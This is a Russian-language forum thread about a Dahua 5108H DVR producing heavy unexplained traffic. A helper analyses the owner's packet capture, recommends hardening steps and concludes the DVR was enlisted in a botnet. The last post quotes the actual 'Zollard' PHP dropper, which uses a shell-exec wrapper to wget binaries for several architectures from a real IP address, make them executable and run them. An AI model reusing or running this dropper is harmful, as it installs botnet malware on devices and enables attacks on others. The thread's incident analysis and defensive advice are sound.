Проблема с интернет-трафиком DAHUA 5108H
Проблема с интернет-трафиком DAHUA 5108H
DVR DAHUA 5108H постоянно отправляет и получает инфу с IP-адресов по всему миру. На служебную информацию совсем не похоже, поскольку за сутки принято-отрправлено в среднем от 400 Мб до 1 Гб. Мой IP-статический, функция динамического ІР отключена, установлен фильтр пользователей по ІР, в журнале нет записей о чужом присутствии в сети. Снифером WireShark зафиксировано IP- адреса и множество портов, через которие идет передача-прием пакетов. В DVR можно заблокировать или разрешить до 10 портов, а что делать со всеми оставшимися? Могу скинуть файл с пакетами для анализа в формате *.pcap на вашу почту (на форуме к сообщениям запрещено прикрепление файлов формата *.pcap). Прошу помощи ибо интернет-трафик стоит денег да и доступ к DVR существенно замедляется, иногда до безобразия.... Заранее благодарю за помощь.
Последний раз редактировалось meta3000 13 дек 2014, 15:10, всего редактировалось 1 раз.
Re: Проблема с интернет-трафиком DAHUA 5108H
Файл можно выложить на файлообменник и скнинуть в почту мне ссылку.
Предлагаю предоставить доступ к регистратору выставив его наружу в полный доступ для изучения.
Какая прошивка стоит на регистраторе?
Когда последний раз прошивался и чем, выслать эту прошивку в почту для изучения.
Посмотрим, подумаем
Почта: iTuneDVR@yandex.ru
Предлагаю предоставить доступ к регистратору выставив его наружу в полный доступ для изучения.
Какая прошивка стоит на регистраторе?
Когда последний раз прошивался и чем, выслать эту прошивку в почту для изучения.
Посмотрим, подумаем
Почта: iTuneDVR@yandex.ru
Re: Проблема с интернет-трафиком DAHUA 5108H
Прикрепление файла *.pcap запрещено администратором. Файл вислан на вашу почту ( iTuneDVR@yandex.ru).
Re: Проблема с интернет-трафиком DAHUA 5108H
meta3000 писал(а):Прикрепление файла *.pcap запрещено администратором. Файл вислан на вашу почту ( iTuneDVR@yandex.ru).
Получил.
Написал ответ!
Re: Проблема с интернет-трафиком DAHUA 5108H
Даже на вскидку изучение файла показало ряд интересных моментов, но сейчас не об этом.
1. Обновить обязательно прошивку видеорегистратора, хотя бы даже на текущую!
2. Необходимо обязательно изменить схему доступа этого видеорегистратора в сеть интернет !
Интернет <-- > Роутер <--> DVR
На роутере сделать правила проброса портов 80,554,37777 (это порты по умолчанию), других порты на регистратор не пробрасывать.
На регистраторе сменить пароль у admin, завести другого пользователя с правами администратора.
Если используется 3G доступ, то лучше найти роутер с поддержкой 3G.
1. Обновить обязательно прошивку видеорегистратора, хотя бы даже на текущую!
2. Необходимо обязательно изменить схему доступа этого видеорегистратора в сеть интернет !
Интернет <-- > Роутер <--> DVR
На роутере сделать правила проброса портов 80,554,37777 (это порты по умолчанию), других порты на регистратор не пробрасывать.
На регистраторе сменить пароль у admin, завести другого пользователя с правами администратора.
Если используется 3G доступ, то лучше найти роутер с поддержкой 3G.
Re: Проблема с интернет-трафиком DAHUA 5108H
Большое спасибо!
Re: Проблема с интернет-трафиком DAHUA 5108H
Из личной переписки вне форума выяснилось, что этот регистратор куплен в 2014 году и не с самой старой, но рабочей прошивкой был подключен к сети интернет напрямую через 3G-модем, подключенный к регистратору.
Изучение содержимого выгрузки показало много интересного:
1. Происходил удалённый доступ на телнет порт регистратора;
2. Автоматищированная передача на регистратор скрипта на исполнение;
3. Получение извне дополнительных данных в виде исполняемого кода под разные платформы и для разныз устройств;
4. Запуск данного кода и использование данного регистратора как бот-нет устройство для передачи данных и атаке на другие устройства в сети интернет;
Пример одного из исполняемого скрипта с реально действующим адресом на закачку файлов.
Желающие могут скачать исполняемые файлы под разные платформы и поизучать
Адрес 84.91.145.222, используемый в скрипте по геолокации определяется как Португалия, но есть и другие адреса, Украина и пр...
Изучение содержимого выгрузки показало много интересного:
1. Происходил удалённый доступ на телнет порт регистратора;
2. Автоматищированная передача на регистратор скрипта на исполнение;
3. Получение извне дополнительных данных в виде исполняемого кода под разные платформы и для разныз устройств;
4. Запуск данного кода и использование данного регистратора как бот-нет устройство для передачи данных и атаке на другие устройства в сети интернет;
Пример одного из исполняемого скрипта с реально действующим адресом на закачку файлов.
Желающие могут скачать исполняемые файлы под разные платформы и поизучать
Адрес 84.91.145.222, используемый в скрипте по геолокации определяется как Португалия, но есть и другие адреса, Украина и пр...
Код: Выделить всё
<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
global $disablefunc;
$result = "";
if (!empty($cmd))
{
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
{
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
}
}
return $result;
}
myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://84.91.145.222:58455/armeabi;chmod +x /tmp/armeabi");
myshellexec("rm -rf /tmp/arm;wget -P /tmp http://84.91.145.222:58455/arm;chmod +x /tmp/arm");
myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://84.91.145.222:58455/ppc;chmod +x /tmp/ppc");
myshellexec("rm -rf /tmp/mips;wget -P /tmp http://84.91.145.222:58455/mips;chmod +x /tmp/mips");
myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://84.91.145.222:58455/mipsel;chmod +x /tmp/mipsel");
myshellexec("rm -rf /tmp/x86;wget -P /tmp http://84.91.145.222:58455/x86;chmod +x /tmp/x86");
myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://84.91.145.222:58455/nodes;chmod +x /tmp/nodes");
myshellexec("rm -rf /tmp/sig;wget -P /tmp http://84.91.145.222:58455/sig;chmod +x /tmp/sig");
myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
?>